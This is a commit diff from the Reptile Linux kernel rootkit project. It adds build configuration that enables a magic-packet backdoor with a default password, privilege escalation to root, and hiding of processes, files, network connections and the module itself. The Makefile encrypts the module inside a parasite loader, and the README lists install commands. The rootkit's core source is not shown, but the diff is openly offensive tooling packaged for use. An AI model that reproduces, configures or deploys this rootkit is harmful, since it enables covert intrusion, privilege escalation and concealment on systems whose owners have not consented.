v2.1

lukevoigt · Mar 1, 2020 · 6bd476e · 6bd476e
1 parent 965dc73
commit 6bd476e
Show file tree

Hide file tree

Showing 163 changed files with 49,891 additions and 1,592 deletions.
diff --git a/Kbuild b/Kbuild
diff --git a/Kconfig b/Kconfig
@@ -0,0 +1,68 @@
+mainmenu "Reptile's configuration"
+
+comment "Chose the features you wanna enable"
+
+config CONFIG_BACKDOOR
+    bool "Backdoor"
+    default y
+
+menu "Backdoor configuration"
+    depends on CONFIG_BACKDOOR
+
+    config MAGIC_VALUE
+        string "Magic value to magic packets"
+        default "hax0r"
+
+    config PASSWORD
+        string "Backdoor password"
+        default "s3cr3t"
+
+    config SRCPORT
+        int "Source port of magic packets"
+        default 666
+        range 0 65535
+
+    comment "END"
+endmenu 
+
+config CONFIG_FILE_TAMPERING
+    bool "Hide specific file contents"
+    default y
+
+menu "Name used in file tampering tags"
+    depends on CONFIG_FILE_TAMPERING
+
+    config TAG_NAME
+        string "Tag name that hide file contents"
+        default "reptile"
+
+    comment "END"
+endmenu
+
+config CONFIG_HIDE_PROC
+    bool "Hide process"
+    default y
+
+config CONFIG_HIDE_DIR
+    bool "Hide files and directories"
+    default y
+
+menu "Hide name (needed to create Reptile's folder)"
+    config HIDE
+        string "Hide name"
+        default "reptile"
+
+    comment "END"
+endmenu
+
+config CONFIG_HIDE_CONN
+    bool "Hide TCP and UDP connections"
+    default y
+
+config CONFIG_AUTO_HIDE
+    bool "Hide kernel module itself"
+    default y
+
+config CONFIG_GIVE_ROOT
+    bool "Enable give root to a process run by an unprivileged user"
+    default y
diff --git a/Makefile b/Makefile
@@ -1,11 +1,66 @@
-all:
-	mkdir -p bin
-	cd sbin && make reverse cmd
-	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$$PWD
-	cd parasite_loader && make
+CC := gcc
+RM = rm -rf
+SHELL := /bin/bash
+KERNEL := /lib/modules/$(shell uname -r)/build
+CLIENT_DIR ?= $(PWD)/userland
+CONFIG_SCRIPT ?= $(PWD)/scripts/kconfig/config.sh
+CONFIG_FILE ?= $(PWD)/.config
+GEN_RANDOM ?= $(PWD)/scripts/random.sh
+BUILD_DIR ?= $(PWD)/output
+BUILD_DIR_MAKEFILE ?= $(BUILD_DIR)/Makefile
+MODULE_DIR ?= $(PWD)/kernel
+ENCRYPT_SRC ?= $(PWD)/kernel/encrypt/encrypt.c
+ENCRYPT ?= $(BUILD_DIR)/encrypt
+KMATRYOSHKA_DIR ?= $(PWD)/kernel/kmatryoshka
+PARASITE ?= $(BUILD_DIR)/reptile_module.ko
+RAND1 = 0x$(shell cat /dev/urandom | head -c 4 | hexdump '-e"%x"')
+RAND2 = 0x$(shell cat /dev/urandom | head -c 4 | hexdump '-e"%x"')
+INCLUDE ?= -I$(PWD)/kernel/include
+LOADER ?= $(PWD)/kernel/loader/loader.c
+INSTALLER ?= $(PWD)/scripts/installer.sh
+
+all: $(BUILD_DIR_MAKEFILE) userland_bin $(ENCRYPT) module kmatryoshka reptile
+
+reptile: $(LOADER)
+	@ $(ENCRYPT) $(BUILD_DIR)/reptile.ko $(RAND2) > $(BUILD_DIR)/reptile.ko.inc
+	@ echo "  CC      $(BUILD_DIR)/$@"
+	@ $(CC) $(INCLUDE) -I$(BUILD_DIR) $< -o $(BUILD_DIR)/$@
+
+kmatryoshka:
+	@ $(ENCRYPT) $(PARASITE) $(RAND1) > $(BUILD_DIR)/parasite_blob.inc
+	@ $(MAKE) -C $(KERNEL) M=$(BUILD_DIR) src=$(KMATRYOSHKA_DIR)
+
+module:
+	@ $(MAKE) -C $(KERNEL) M=$(BUILD_DIR) src=$(MODULE_DIR)
+
+$(ENCRYPT): $(ENCRYPT_SRC)
+	@ echo "  CC      $(ENCRYPT)"
+	@ $(CC) $(INCLUDE) -std=c99 $< -o $@
+
+$(BUILD_DIR):
+	@ mkdir -p $(BUILD_DIR)
+
+$(BUILD_DIR_MAKEFILE): $(BUILD_DIR)
+	@ touch $@
+
+config:
+	@ $(SHELL) $(CONFIG_SCRIPT) $@
+	@ $(SHELL) $(GEN_RANDOM) $(CONFIG_FILE)
+
+%config:
+	@ $(SHELL) $(CONFIG_SCRIPT) $@
+	@ $(SHELL) $(GEN_RANDOM) $(CONFIG_FILE)
+
+userland_bin:
+	@ $(MAKE) -C $(CLIENT_DIR) EXTRA_FLAGS=-D_REPTILE_
+
+install:
+	@ $(SHELL) $(INSTALLER)
+
+client: $(BUILD_DIR)
+	@ $(MAKE) -C $(CLIENT_DIR) packet listener client
+
+.PHONY : clean module config
+
 clean:
-	cd sbin && make clean
-	$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$$PWD clean
-	cd parasite_loader && make clean
-	rm -rf config.h
-
+	@ $(RM) $(BUILD_DIR) $(CONFIG_FILE)
diff --git a/README.md b/README.md
@@ -11,7 +11,6 @@
 **Debian 10**: 4.19.0-8-amd64<br>
 **Ubuntu 18.04.1 LTS**: 4.15.0-38-generic<br>
 **Kali Linux**: 4.18.0-kali2-amd64<br>
-**Kali Linux**: 5.4.0-kali3-amd64<br>
 **Centos 6.10**: 2.6.32-754.6.3.el6.x86_64<br>
 **Centos 7**: 3.10.0-862.3.2.el7.x86_64<br>
 **Centos 8**: 4.18.0-147.5.1.el8_1.x86_64
@@ -33,18 +32,21 @@
 
 ## Install
 ```
-apt-get install linux-headers-$(uname -r)
+apt install build-essential libncurses-dev linux-headers-$(uname -r)
 git clone https://github.com/f0rb1dd3n/Reptile.git
 cd Reptile
-./setup.sh install
+make config # or 'make menuconfig' or even 'make defconfig'
+make
+make install
 ```
+More details about the installation see [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Install)
 ## Uninstall
-```
-./setup.sh remove
-```
+
+When you got a sucessfully instalation, the way to remove that will be shown in screen
+
 ## Usage
 
-See [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Usage) to usage details.
+See [Wiki](https://github.com/f0rb1dd3n/Reptile/wiki/Usage) to usage details. So, read the fucking manual before opening an issue!
 
 ## Warning
 
@@ -53,12 +55,9 @@ Some functions of this module is based on another rootkits. Please see the refer
 ## References
 
 - “[LKM HACKING](http://www.ouah.org/LKM_HACKING.html)”, The Hackers Choice (THC), 1999;
-- https://github.com/milabs
 - https://github.com/mncoppola/suterusu
-- https://github.com/m0nad/Diamorphine.git
 - https://github.com/David-Reguera-Garcia-Dreg/enyelkm.git
 - https://github.com/creaktive/tsh
-- http://www.drkns.net/kernel-who-does-magic/
 - https://github.com/brenns10/lsh
 
 ## Thanks

diff --git a/configs/defconfig b/configs/defconfig
@@ -0,0 +1,44 @@
+#
+# Automatically generated file; DO NOT EDIT.
+# Reptile's configuration
+#
+
+#
+# Chose the features you wanna enable
+#
+CONFIG_BACKDOOR=y
+
+#
+# Backdoor configuration
+#
+MAGIC_VALUE="hax0r"
+PASSWORD="s3cr3t"
+SRCPORT=666
+
+#
+# END
+#
+CONFIG_FILE_TAMPERING=y
+
+#
+# Name used in file tampering tags
+#
+TAG_NAME="reptile"
+
+#
+# END
+#
+CONFIG_HIDE_PROC=y
+CONFIG_HIDE_DIR=y
+
+#
+# Hide name (needed to create Reptile's folder)
+#
+HIDE="reptile"
+
+#
+# END
+#
+CONFIG_HIDE_CONN=y
+CONFIG_AUTO_HIDE=y
+CONFIG_GIVE_ROOT=y
diff --git a/kernel/Kbuild b/kernel/Kbuild
@@ -0,0 +1,39 @@
+MODNAME		                        ?= reptile_module
+CONFIG_FILE                         := $(src)/../.config
+
+include $(CONFIG_FILE)
+
+ccflags-y	                        += -I$(src)/include -Werror -fno-stack-protector -fomit-frame-pointer
+ldflags-y	                        += -T$(src)/khook/engine.lds
+
+obj-m		                        += $(MODNAME).o
+$(MODNAME)-y	                    += main.o string_helpers.o util.o
+
+$(MODNAME)-$(CONFIG_BACKDOOR)       += backdoor.o
+$(MODNAME)-$(CONFIG_HIDE_PROC)      += proc.o
+$(MODNAME)-$(CONFIG_HIDE_DIR)       += dir.o
+$(MODNAME)-$(CONFIG_FILE_TAMPERING) += file.o
+$(MODNAME)-$(CONFIG_HIDE_CONN)      += network.o
+$(MODNAME)-$(CONFIG_AUTO_HIDE)      += module.o
+
+ccflags-$(CONFIG_BACKDOOR)          += -DCONFIG_BACKDOOR
+ccflags-$(CONFIG_BACKDOOR)          += -DMAGIC_VALUE=\"$(MAGIC_VALUE)\"
+ccflags-$(CONFIG_BACKDOOR)          += -DPASSWORD=\"$(PASSWORD)\"
+ccflags-$(CONFIG_BACKDOOR)          += -DSRCPORT=$(SRCPORT)
+
+ccflags-$(CONFIG_FILE_TAMPERING)    += -DCONFIG_FILE_TAMPERING
+ccflags-$(CONFIG_FILE_TAMPERING)    += -DTAG_NAME=\"$(TAG_NAME)\"
+
+ccflags-$(CONFIG_HIDE_DIR)          += -DCONFIG_HIDE_DIR
+ccflags-$(CONFIG_HIDE_DIR)          += -DHIDE=\"$(HIDE)\"
+
+ccflags-$(CONFIG_HIDE_PROC)         += -DCONFIG_HIDE_PROC
+ccflags-$(CONFIG_HIDE_CONN)         += -DCONFIG_HIDE_CONN
+ccflags-$(CONFIG_AUTO_HIDE)         += -DCONFIG_AUTO_HIDE
+ccflags-$(CONFIG_GIVE_ROOT)         += -DCONFIG_GIVE_ROOT
+
+ccflags-y                           += -DAUTH=$(AUTH)
+ccflags-y                           += -DHTUA=$(HTUA)
+
+KBUILD_CFLAGS	                    := $(filter-out -pg,$(KBUILD_CFLAGS))
+KBUILD_CFLAGS	                    := $(filter-out -mfentry,$(KBUILD_CFLAGS))